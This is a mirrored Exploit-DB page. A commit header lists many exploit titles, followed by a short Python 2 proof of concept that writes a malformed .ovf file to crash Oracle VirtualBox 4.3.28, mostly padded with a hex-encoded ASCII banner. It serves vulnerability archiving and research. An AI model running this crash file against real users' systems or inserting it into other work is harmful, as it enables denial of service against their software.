bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/windows/dos/40618.py
Offensive Security 506182d72d DB: 2016-10-22 
7 new exploits

RealSecure / Blackice - iss_pam1.dll Remote Overflow
RealSecure / Blackice - 'iss_pam1.dll' Remote Overflow

Wireshark 1.2.10 - (airpcap.dll) DLL Hijacking Exploit
Wireshark 1.2.10 - 'airpcap.dll' DLL Hijacking

Microsoft Power Point 2010 - 'pptimpconv.dll' DLL Hijacking Exploit
Microsoft Power Point 2010 - 'pptimpconv.dll' DLL Hijacking
uTorrent 2.0.3 - (plugin_dll.dll) DLL Hijacking Exploit
Microsoft Windows Live Email - 'dwmapi.dll' DLL Hijacking Exploit
uTorrent 2.0.3 - 'plugin_dll.dll' DLL Hijacking
Microsoft Windows Live Email - 'dwmapi.dll' DLL Hijacking
Mozilla Firefox 3.6.8 - (dwmapi.dll) DLL Hijacking Exploit
Microsoft Windows Movie Maker 2.6.4038.0 - (hhctrl.ocx) DLL Hijacking Exploit
Opera 10.61 - DLL Hijacking Exploit (dwmapi.dll)
Microsoft Windows 7 - wab.exe DLL Hijacking Exploit (wab32res.dll)
TeamViewer 5.0.8703 - (dwmapi.dll) DLL Hijacking Exploit
Adobe Dreamweaver CS4 - 'ibfs32.dll' DLL Hijacking Exploit
Microsoft Visio 2003 - 'mfc71enu.dll' DLL Hijacking Exploit
Microsoft Address Book 6.00.2900.5512 - (wab32res.dll) DLL Hijacking Exploit
Microsoft Office Groove 2007 - 'mso.dll' DLL Hijacking Exploit
TeamMate Audit Management Software Suite - 'mfc71enu.dll' DLL Hijacking Exploit
Mozilla Firefox 3.6.8 - 'dwmapi.dll' DLL Hijacking
Microsoft Windows Movie Maker 2.6.4038.0 - 'hhctrl.ocx' DLL Hijacking
Opera 10.61 - 'dwmapi.dll' DLL Hijacking
Microsoft Windows 7 - 'wab32res.dll' wab.exe DLL
TeamViewer 5.0.8703 - 'dwmapi.dll' DLL Hijacking
Adobe Dreamweaver CS4 - 'ibfs32.dll' DLL Hijacking
Microsoft Visio 2003 - 'mfc71enu.dll' DLL Hijacking
Microsoft Address Book 6.00.2900.5512 - 'wab32res.dll' DLL Hijacking
Microsoft Office Groove 2007 - 'mso.dll' DLL Hijacking
TeamMate Audit Management Software Suite - 'mfc71enu.dll' DLL Hijacking
BS.Player 2.56 build 1043 - (mfc71loc.dll) DLL Hijacking Exploit
Adobe Dreamweaver CS5 11.0 build 4909 - DLL Hijacking Exploit (mfc90loc.dll)
Adobe Photoshop CS2 - 'Wintab32.dll' DLL Hijacking Exploit
BS.Player 2.56 build 1043 - 'mfc71loc.dll' DLL Hijacking
Adobe Dreamweaver CS5 11.0 build 4909 -  'mfc90loc.dll' DLL Hijacking
Adobe Photoshop CS2 - 'Wintab32.dll' DLL Hijacking

Avast! 5.0.594 - (mfc90loc.dll) License Files DLL Hijacking Exploit
Avast! 5.0.594 - 'mfc90loc.dll' License Files DLL Hijacking

VideoLAN VLC Media Player - 'wintab32.dll' DLL Hijacking Exploit
VideoLAN VLC Media Player - 'wintab32.dll' DLL Hijacking
Roxio Photosuite 9 - 'homeutils9.dll' DLL Hijacking Exploit
Safari 5.0.1 - DLL Hijacking Exploit (dwmapi.dll)
InterVideo WinDVD 5 - 'cpqdvd.dll' DLL Hijacking Exploit
Microsoft Internet Connection Signup Wizard - 'smmscrpt.dll' DLL Hijacking Exploit
Adobe Device Central CS5 - 'qtcf.dll' DLL Hijacking Exploit
Ettercap NG-0.7.3 - (wpcap.dll) DLL Hijacking Exploit
Microsoft Group Convertor - 'imm.dll' DLL Hijacking Exploit
Roxio Photosuite 9 - 'homeutils9.dll' DLL Hijacking
Safari 5.0.1 - 'dwmapi.dll' DLL Hijacking
InterVideo WinDVD 5 - 'cpqdvd.dll' DLL Hijacking
Microsoft Internet Connection Signup Wizard - 'smmscrpt.dll' DLL Hijacking
Adobe Device Central CS5 - 'qtcf.dll' DLL Hijacking
Ettercap NG-0.7.3 - 'wpcap.dll' DLL Hijacking
Microsoft Group Convertor - 'imm.dll' DLL Hijacking
TechSmith Snagit 10 (Build 788) - 'dwmapi.dll' DLL Hijacking Exploit
MediaPlayer Classic 1.3.2189.0 - DLL Hijacking Exploit (iacenc.dll)
Skype 4.2.0.169 - (wab32.dll) DLL Hijacking Exploit
TechSmith Snagit 10 (Build 788) - 'dwmapi.dll' DLL Hijacking
MediaPlayer Classic 1.3.2189.0 - 'iacenc.dll' DLL Hijacking
Skype 4.2.0.169 - 'wab32.dll' DLL Hijacking
Roxio Creator DE - 'HomeUtils9.dll' DLL Hijacking Exploit
Nvidia Driver - DLL Hijacking Exploit (nview.dll)
Adobe Premier Pro CS4 - 'ibfs32.dll' DLL Hijacking Exploit
Adobe On Location CS4 - 'ibfs32.dll' DLL Hijacking Exploit
Adobe Illustrator CS4 - 'aires.dll' DLL Hijacking Exploit
Cisco Packet Tracer 5.2 - (wintab32.dll) DLL Hijacking Exploit
Adobe InDesign CS4 - 'ibfs32.dll' DLL Hijacking Exploit
Roxio Creator DE - 'HomeUtils9.dll' DLL Hijacking
Nvidia Driver -  'nview.dll' DLL Hijacking
Adobe Premier Pro CS4 - 'ibfs32.dll' DLL Hijacking
Adobe On Location CS4 - 'ibfs32.dll' DLL Hijacking
Adobe Illustrator CS4 - 'aires.dll' DLL Hijacking
Cisco Packet Tracer 5.2 - 'wintab32.dll' DLL Hijacking
Adobe InDesign CS4 - 'ibfs32.dll' DLL Hijacking
Microsoft Windows Contacts - 'wab32res.dll' DLL Hijacking Exploit
Microsoft Windows Internet Communication Settings - 'schannel.dll' DLL Hijacking Exploit
Roxio MyDVD 9 - 'HomeUtils9.dll' DLL Hijacking Exploit
Microsoft PowerPoint 2007 - 'rpawinet.dll' DLL Hijacking Exploit
Mozilla Thunderbird - DLL Hijacking Exploit (dwmapi.dll)
Adobe Extension Manager CS5 5.0.298 - DLL Hijacking Exploit (dwmapi.dll)
Adobe ExtendedScript Toolkit CS5 3.5.0.52 - DLL Hijacking Exploit (dwmapi.dll)
CorelDRAW X3 13.0.0.576 - DLL Hijacking Exploit (crlrib.dll)
Corel PHOTO-PAINT X3 13.0.0.576 - DLL Hijacking Exploit (crlrib.dll)
Media Player Classic 6.4.9.1 - (iacenc.dll) DLL Hijacking Exploit
Nullsoft Winamp 5.581 - DLL Hijacking Exploit (wnaspi32.dll)
Google Earth 5.1.3535.3218 - DLL Hijacking Exploit (quserex.dll)
Daemon Tools Lite - 'mfc80loc.dll' DLL Hijacking Exploit
Microsoft Windows Contacts - 'wab32res.dll' DLL Hijacking
Microsoft Windows Internet Communication Settings - 'schannel.dll' DLL Hijacking
Roxio MyDVD 9 - 'HomeUtils9.dll' DLL Hijacking
Microsoft PowerPoint 2007 - 'rpawinet.dll' DLL Hijacking
Mozilla Thunderbird - 'dwmapi.dll' DLL Hijacking
Adobe Extension Manager CS5 5.0.298 -  'dwmapi.dll' DLL Hijacking
Adobe ExtendedScript Toolkit CS5 3.5.0.52 - 'dwmapi.dll' DLL Hijacking
CorelDRAW X3 13.0.0.576 - 'crlrib.dll' DLL Hijacking
Corel PHOTO-PAINT X3 13.0.0.576 -  'crlrib.dll' DLL Hijacking
Media Player Classic 6.4.9.1 - 'iacenc.dll' DLL Hijacking
Nullsoft Winamp 5.581 - 'wnaspi32.dll' DLL Hijacking
Google Earth 5.1.3535.3218 -  'quserex.dll' DLL Hijacking
Daemon Tools Lite - 'mfc80loc.dll' DLL Hijacking

Autodesk AutoCAD 2007 - 'color.dll' DLL Hijacking Exploit
Autodesk AutoCAD 2007 - 'color.dll' DLL Hijacking

Microsoft Edge - Array.map Heap Overflow (MS16-119)
Microsoft Edge - 'Array.map' Heap Overflow (MS16-119)

Microsoft Edge - Array.join Info Leak (MS16-119)
Microsoft Edge - 'Array.join' Infomation Leak (MS16-119)

Adobe Flash - Transform.colorTranform Getter Info Leak
Adobe Flash - Transform.colorTranform Getter Infomation Leak
Windows DFS Client Driver - Arbitrary Drive Mapping Privilege Escalation (MS16-123)
Windows DeviceApi CMApi - PiCMOpenDeviceKey Arbitrary Registry Key Write Privilege Escalation (MS16-124)
Windows DeviceApi CMApi - User Hive Impersonation Privilege Escalation (MS16-124)
Microsoft Windows - DFS Client Driver Arbitrary Drive Mapping Privilege Escalation (MS16-123)
Microsoft Windows - DeviceApi CMApi PiCMOpenDeviceKey Arbitrary Registry Key Write Privilege Escalation (MS16-124)
Microsoft Windows - DeviceApi CMApi User Hive Impersonation Privilege Escalation (MS16-124)
Windows win32k.sys - TTF Processing RCVT TrueType Instruction Handler Out-of-Bounds Read (MS16-120)
Windows win32k.sys - TTF Processing win32k!sbit_Embolden / win32k!ttfdCloseFontContext Use-After-Free (MS16-120)
Windows Kernel - Registry Hive Loading Negative RtlMoveMemory Size in nt!CmpCheckValueList (MS16-124)
Windows Kernel - Registry Hive Loading Relative Arbitrary Read in nt!RtlValidRelativeSecurityDescriptor (MS16-123)
Microsoft Edge - Function.apply Info Leak (MS16-119)
Microsoft Windows - 'win32k.sys' TTF Processing RCVT TrueType Instruction Handler Out-of-Bounds Read (MS16-120)
Microsoft Windows - 'win32k.sys' TTF Processing win32k!sbit_Embolden / win32k!ttfdCloseFontContext Use-After-Free (MS16-120)
Microsoft Windows Kernel - Registry Hive Loading Negative RtlMoveMemory Size in nt!CmpCheckValueList (MS16-124)
Microsoft Windows Kernel - Registry Hive Loading Relative Arbitrary Read in nt!RtlValidRelativeSecurityDescriptor (MS16-123)
Microsoft Edge - Function.apply Infomation Leak (MS16-119)
Windows Edge/IE - Isolated Private Namespace Insecure DACL Privilege Escalation (MS16-118)
Windows Edge/IE - Isolated Private Namespace Insecure Boundary Descriptor Privilege Escalation (MS16-118)
Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure DACL Privilege Escalation (MS16-118)
Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure Boundary Descriptor Privilege Escalation (MS16-118)
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' Race Condition Privilege Escalation (Write Access)
Just Dial Clone Script - SQL Injection
FreePBX 10.13.66 - Remote Command Execution / Privilege Escalation
RealPlayer 18.1.5.705 - '.QCP' Crash (PoC)
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' Race Condition Privilege Escalation (SUID)
Oracle VM VirtualBox 4.3.28 - '.ovf' Crash (PoC)
TrendMicro InterScan Web Security Virtual Appliance - Remote Code Execution (Shellshock)
2016-10-22 05:01:17 +00:00

91 lines
No EOL
5.8 KiB
Python
Executable file
Raw Blame History

#Exploit Title: Oracle VM VirtualBox 4.3.28 Crash
#Author: sultan albalawi
#Tested on:win7
#open viryualbox -->ctrl+i-->choose file -->double+double+double next
ban= '\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x5c\x20\x20\x20\x2d\x20\x20'
ban+='\x2d\x20\x20\x2d\x20\x3c\x73\x65\x72\x76\x65\x72\x3e\x20\x20\x2d'
ban+='\x20\x5c\x2d\x2d\x2d\x3c\x20\x2d\x20\x2d\x20\x20\x2d\x20\x2d\x20'
ban+='\x20\x2d\x20\x20\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x0d\x0a\x20\x20\x20'
ban+='\x20\x20\x20\x20\x7c\x20\x20\x20\x20\x44\x6f\x63\x5f\x41\x74\x74'
ban+='\x61\x63\x6b\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a'
ban+='\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20'
ban+='\x20\x20\x20\x76\x20\x20\x20\x20\x20\x20\x20\x20\x60\x20\x60\x2e'
ban+='\x20\x20\x20\x20\x2c\x3b\x27\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x41\x70\x50'
ban+='\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x60\x2e\x20\x20\x2c\x27\x2f\x20\x2e\x27'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d'
ban+='\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x60\x2e\x20\x58\x20\x2f\x2e\x27\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x2a\x20\x20\x20\x20\x20\x2a\x2a\x2a'
ban+='\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2e\x2d\x3b\x2d\x2d\x27\x27\x2d\x2d\x2e\x5f\x60\x20'
ban+='\x60\x20\x28\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x0d'
ban+='\x0a\x20\x20\x20\x20\x20\x2e\x27\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2f\x20\x20\x20\x20\x27\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x7c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x3b\x53\x65\x63\x75\x72\x69\x74\x79\x60\x20\x20'
ban+='\x27\x20\x30\x20\x20\x30\x20\x27\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x2a\x2a\x2a\x4e\x45\x54\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20'
ban+='\x20\x7c\x0d\x0a\x20\x20\x20\x20\x2c\x20\x20\x20\x20\x20\x20\x20'
ban+='\x2c\x20\x20\x20\x20\x27\x20\x20\x7c\x20\x20\x27\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x5e\x0d\x0a\x20\x2c\x2e\x20\x7c\x20\x20'
ban+='\x20\x20\x20\x20\x20\x27\x20\x20\x20\x20\x20\x60\x2e\x5f\x2e\x27'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c'
ban+='\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x5e\x2d\x2d\x2d\x5e\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a\x20\x3a\x20\x20\x2e\x20\x60'
ban+='\x20\x20\x3b\x20\x20\x20\x60\x20\x20\x60\x20\x2d\x2d\x2c\x2e\x2e'
ban+='\x5f\x3b\x2d\x2d\x2d\x3e\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c'
ban+='\x20\x20\x20\x20\x20\x20\x20\x27\x2e\x27\x2e\x27\x5f\x5f\x5f\x5f'
ban+='\x5f\x5f\x5f\x5f\x20\x2a\x0d\x0a\x20\x20\x27\x20\x60\x20\x20\x20'
ban+='\x20\x2c\x20\x20\x20\x29\x20\x20\x20\x2e\x27\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5e\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x7c\x5f\x7c\x20\x46\x69\x72\x65\x77'
ban+='\x61\x6c\x6c\x20\x29\x0d\x0a\x20\x20\x20\x20\x20\x60\x2e\x5f\x20'
ban+='\x2c\x20\x20\x27\x20\x20\x20\x2f\x5f\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20'
ban+='\x7c\x7c\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3b\x20\x2c\x27'
ban+='\x27\x2d\x2c\x3b\x27\x20\x60\x60\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f'
ban+='\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x7c\x0d\x0a\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x60\x60\x2d\x2e\x2e\x5f\x5f\x60\x60\x2d'
ban+='\x2d\x60\x20\x20\x20\x20\x20\x20\x20\x69\x70\x73\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5e'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x27'
ban+='\x2e\x20\x5f\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2a\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x20'
ban+='\x7c\x5f\x20\x20\x49\x50\x53\x20\x20\x20\x20\x20\x29\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20\x20\x7c\x7c\x0d\x0a\x20'
ban+='\n'
ban+='\x53\x75\x6c\x74\x61\x6e\x5f\x41\x6c\x62\x61\x6c\x61\x77\x69\n'
ban+='\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x61\x63\x65\x62\x6f\x6f\x6b\x2e\x63\x6f\x6d\x2f\x70\x65\x6e\x74\x65\x73\x74\x33\n'
print ban
pof1 = "<"
pof2 = "http://"
Crash = "\x41"*19
pof3=">"
vm = pof1+pof2+Crash+pof3+pof1+pof2+Crash+pof3
Crash_file=("Crach.ovf")
file = open(Crash_file, "w")
file.write(vm)
file.close()
print 'file done'.format(Crash_file)
Reference in a new issue View git blame Copy permalink